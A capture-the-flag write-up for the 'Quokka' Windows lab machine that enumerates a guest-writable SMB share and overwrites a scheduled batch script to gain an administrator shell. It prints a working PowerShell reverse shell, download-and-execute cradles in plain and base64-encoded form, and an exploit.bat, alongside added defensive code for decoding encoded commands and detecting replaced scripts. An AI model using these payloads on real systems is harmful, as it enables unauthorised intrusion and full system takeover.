Quokka – TheHackersLabs
- OS: Linux
- Difficulty: Easy
- Platform: TheHackersLabs
Summary
“Quokka” is an easy machine from the TheHackersLabs platform. After inspecting the shared resources exposed by the SMB service of this machine, we find a .bat script that is executed every minute. Since we have permission to overwrite this file, we replace it with a malicious one to get access to the victim machine. The shell we obtain belongs to a privileged user, pwning the machine.
User
Starting with a quick Nmap scan:
❯ sudo nmap -sS -p- --min-rate=5000 --open -n -Pn -vvv 10.20.1.145
We can see multiple ports open. Among them we have: 80 HTTP with Microsoft Internet Information Services (IIS), 135 Microsoft RPC, 445 Server Message Block (SMB) and 5985 Windows Remote Management (WinRM).
Checking their versions and applying some recognition scripts with the -sVC flag returns:
❯ sudo nmap -sVC -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.20.1.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 04:53 -03
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.20.1.145
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Portfolio y Noticias Tech de Quokka
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:FF:0F:BA (Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-03T07:53:59
|_ start_date: 2024-11-03T07:44:25
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ff:0f:ba (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WIN-VRU3GG3DPLJ
| NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-11-03T08:53:59+01:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.16 seconds
Visiting http://10.20.1.145 (the victim machine's HTTP site) shows a kind of blog about cybersecurity, but the site does not present much more info besides this topic.
From the Nmap scan output I can see that the SMB service allows guest login. We can use this access to first check whether there are any shares, with NetExec:
❯ nxc smb 10.20.1.145 -u 'guest' -p '' --shares
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [*] Enumerated shares
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ Compartido READ,WRITE
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ IPC$ IPC remota
and we do have a shared resource called Compartido.
We can also use NetExec with --rid-brute to see if we can enumerate users:
❯ nxc smb 10.20.1.145 -u 'guest' -p '' --rid-brute
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 500: WIN-VRU3GG3DPLJ\Administrador (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 501: WIN-VRU3GG3DPLJ\Invitado (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 503: WIN-VRU3GG3DPLJ\DefaultAccount (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 513: WIN-VRU3GG3DPLJ\Ninguno (SidTypeGroup)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 1000: WIN-VRU3GG3DPLJ\Omar (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 1001: WIN-VRU3GG3DPLJ\0mar (SidTypeUser)
We have 2 potential users: Omar and 0mar.
We can then use smbclient to enumerate the files within the Compartido share with the command:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido -c 'recurse; ls'
. D 0 Sun Nov 3 05:22:23 2024
.. D 0 Sun Nov 3 05:22:23 2024
Documentación D 0 Sun Oct 27 11:33:53 2024
Logs D 0 Sun Oct 27 11:33:54 2024
Proyectos D 0 Sun Oct 27 11:33:54 2024
<SNIP>
Those are a lot of files. I will download all of them by connecting to this shared resource with smbclient as the guest user and running:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'recurse ON; prompt OFF; mget *'
getting file \Documentación\Diagrama_Flujo.pptx of size 0 as Documentación/Diagrama_Flujo.pptx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Informe_Proyecto.pdf of size 0 as Documentación/Informe_Proyecto.pdf (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Archivos_Antiguos\Antiguo_Informe.docx of size 0 as Documentación/Archivos_Antiguos/Antiguo_Informe.docx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
<SNIP>
Eventually, after inspecting some files, we find a script named mantenimiento.bat with the content:
@echo off
:: Backup system maintenance
:: This script is executed every minute
REM Hint: Maybe there is something more here...
:: Reverse shell to Kali
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.1.36:8000/shell.ps1')"
:: End of script
exit
The hint says this script is executed every minute. We also had WRITE permissions over this shared resource. What if we replace this .bat script with a new one? For this we will create 2 files, a file named cradle.ps1 and a file named rev.ps1. I usually do this on Windows machines just to check whether Windows Defender blocks the reverse shell. Therefore, first grab a reverse shell PowerShell one-liner script from Nishang, copy it and adapt it to our attacker machine:
$client = New-Object System.Net.Sockets.TCPClient('10.20.1.110',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
where 10.20.1.110 is our attacker IP and 443 the port I will start listening on with netcat to obtain a reverse shell. I save this code into a file named rev.ps1.
Then, I create a file named cradle.ps1 with the content:
IEX(New-Object Net.WebClient).downloadString('http://10.20.1.110:8080/rev.ps1')
Encode this payload to pass it to PowerShell:
❯ cat cradle.ps1 | iconv -t utf-16le | base64 -w0; echo
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA==
and write a file named exploit.bat with the content:
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA=="
exit
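The -enc argument above is just the cradle in UTF-16LE wrapped in base64, which is also how an analyst sees it in a process-creation log. The following decoder is an added example written for this write-up, not the author's code or part of the machine: it reverses the `iconv -t utf-16le | base64 -w0` step, pulls every encoded payload out of a command line, and flags the download-cradle indicators (IEX, Net.WebClient, DownloadString) that were also visible in the original mantenimiento.bat. The sample command line is the exploit.bat line from above, used as constructed log input; the indicator list is an assumption, not a vendor signature.

```python
"""Decode PowerShell -enc / -EncodedCommand payloads and flag download-cradle
indicators. Added example, not code from the write-up; the sample command line
is the exploit.bat line from the write-up, used here as constructed log input."""
import base64
import re

# The base64 blob from the write-up (UTF-16LE cradle.ps1, base64-encoded).
ENCODED_FROM_WRITEUP = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAp"
    "AC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIA"
    "MAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA=="
)

# Constructed sample: the exploit.bat command line as it would appear in a
# process-creation log (Sysmon event 1 / Security 4688).
SAMPLE_CMDLINE = (
    'powershell -NoP -NonI -W Hidden -Exec Bypass -Command "powershell -enc '
    + ENCODED_FROM_WRITEUP + '"'
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen in practice. The base64 alphabet ends the capture.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Assumed indicator list for download-and-execute cradles (not a vendor rule).
CRADLE_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "frombase64string",
)

URL_RE = re.compile(r"https?://[^\s'\"]+")


def encode_command(script: str) -> str:
    """What `iconv -t utf-16le | base64 -w0` produces: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse of encode_command: base64 -> UTF-16LE bytes -> text."""
    return base64.b64decode(blob).decode("utf-16-le")


def find_encoded_commands(cmdline: str) -> list:
    """Decoded text of every -enc payload in a command line (empty if none)."""
    return [decode_command(blob) for blob in ENC_RE.findall(cmdline)]


def cradle_indicators(text: str) -> list:
    """Indicator substrings present in text, case-insensitive."""
    low = text.lower()
    return [ind for ind in CRADLE_INDICATORS if ind in low]


def analyse(cmdline: str) -> dict:
    """Decode payloads, then scan both the plain part of the command line and
    each decoded payload for indicators and URLs."""
    decoded = find_encoded_commands(cmdline)
    # Drop the base64 blobs before scanning plain text so random base64
    # characters cannot produce false indicator hits.
    plain = ENC_RE.sub("", cmdline)
    texts = [plain] + decoded
    indicators = set()
    urls = []
    for text in texts:
        indicators.update(cradle_indicators(text))
        urls.extend(URL_RE.findall(text))
    return {"decoded": decoded, "indicators": sorted(indicators), "urls": urls}


if __name__ == "__main__":
    result = analyse(SAMPLE_CMDLINE)
    for payload in result["decoded"]:
        print("decoded:", payload.strip())
    print("indicators:", result["indicators"])
    print("urls:", result["urls"])
```

The decoded text ends with a newline because `cat cradle.ps1` included the file's trailing newline; the round trip through encode_command reproduces the exact blob from the write-up only if that newline is kept. In a SOC pipeline the same function is run over the CommandLine field of every PowerShell process start, and a hit on a decoded cradle that fetches from an internal address is exactly the event a scheduled script like mantenimiento.bat would generate every minute.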
Start a listener with netcat on port 443 in a terminal and, in another one, expose the files in a temporary Python HTTP server on port 8080:
❯ ls -la && python3 -m http.server 8080
total 16
drwxrwxr-x 2 gunzf0x gunzf0x 4096 Nov 3 05:46 .
drwxrwxr-x 5 gunzf0x gunzf0x 4096 Nov 3 04:49 ..
-rw-rw-r-- 1 gunzf0x gunzf0x 80 Nov 3 05:46 cradle.ps1
-rw-rw-r-- 1 gunzf0x gunzf0x 501 Nov 3 05:46 rev.ps1
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Finally, since we assume that the mantenimiento.bat script is running every minute (as the hint said), just upload exploit.bat as mantenimiento.bat with smbclient, replacing the original file:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; put exploit.bat mantenimiento.bat'
putting file exploit.bat as \Proyectos\Quokka\Código\mantenimiento.bat (298.8 kb/s) (average 298.8 kb/s)
We can check that our file has been uploaded by looking at the dates of the files:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; ls'
. D 0 Sun Oct 27 11:58:54 2024
.. D 0 Sun Oct 27 11:58:54 2024
index.html A 52 Sun Oct 27 11:33:54 2024
mantenimiento - copia.bat A 1252 Sun Oct 27 11:41:43 2024
mantenimiento.bat A 306 Sun Nov 3 05:58:38 2024
README.md A 56 Sun Oct 27 11:33:54 2024
7735807 blocks of size 4096. 4637866 blocks available
The date is different and, therefore, the file has been modified.
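The timestamp check above is the same signal a defender can use: a script that a scheduled task executes from a share has changed size and content while its backup copy did not. The following is an added example, not the write-up's or the machine's own code: it takes a hash baseline of every script under a share and reports which ones were modified, added or removed afterwards. The directory layout and file contents are constructed to mirror Proyectos/Quokka/Código (spelled without the accent here), and the script extensions list is an assumption.

```python
"""Detect a replaced scheduled script on a share via a hash baseline.
Added example, not part of the write-up; the share layout below is constructed."""
import hashlib
import tempfile
from pathlib import Path

# Assumed set of script types worth baselining on a share.
SCRIPT_SUFFIXES = {".bat", ".cmd", ".ps1", ".vbs"}


def sha256_of(path: Path) -> str:
    """Stream the file so large share contents do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def baseline(root: Path) -> dict:
    """Map share-relative path -> (size, sha256) for every script under root."""
    return {
        p.relative_to(root).as_posix(): (p.stat().st_size, sha256_of(p))
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES
    }


def diff_baseline(old: dict, new: dict) -> dict:
    """Compare two snapshots; any change in size or hash counts as modified."""
    return {
        "modified": sorted(k for k in old if k in new and old[k] != new[k]),
        "added": sorted(k for k in new if k not in old),
        "removed": sorted(k for k in old if k not in new),
    }


def demo() -> dict:
    """Build a constructed share, snapshot it, replace the maintenance script
    the way the write-up does, and report what changed."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        code = root / "Proyectos" / "Quokka" / "Codigo"
        code.mkdir(parents=True)
        # Constructed files mirroring the share listing (contents are made up).
        (code / "index.html").write_text("<html></html>\n")
        (code / "README.md").write_text("# Quokka\n")
        (code / "mantenimiento.bat").write_text(
            "@echo off\n:: original maintenance script\nexit\n")
        (code / "mantenimiento - copia.bat").write_text(
            "@echo off\n:: backup copy, untouched\nexit\n")
        (code / "viejo.cmd").write_text("@echo off\nexit\n")
        before = baseline(root)

        # Same name, different content: what an overwrite over SMB looks like.
        (code / "mantenimiento.bat").write_text(
            "@echo off\n:: replaced content\nexit\n")
        (code / "nuevo.ps1").write_text("Write-Host 'new file'\n")
        (code / "viejo.cmd").unlink()
        after = baseline(root)
        return diff_baseline(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Non-script files such as index.html are deliberately left out of the snapshot, so the report only lists things a scheduler could execute. Running this periodically against the share only catches the overwrite after the fact; the root cause on this machine is that a privileged scheduled task executes a script from a share the guest account can write to, and removing guest write access (or moving the script to a protected local path) is the fix that prevents it.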
After some seconds, we get a request in our Python HTTP server, and get a shell as the administrador user:
❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.20.1.110] from (UNKNOWN) [10.20.1.145] 49746
whoami
win-vru3gg3dplj\administrador
PS C:\Windows\system32>
This is a privileged user. GG.
We can finally read both flags:
PS C:\Windows\system32> type C:\Users\0mar\Desktop\user.txt
9OWi***************
PS C:\Windows\system32> type C:\Users\Administrador\Desktop\admin.txt
j9eC********************
~Happy Hacking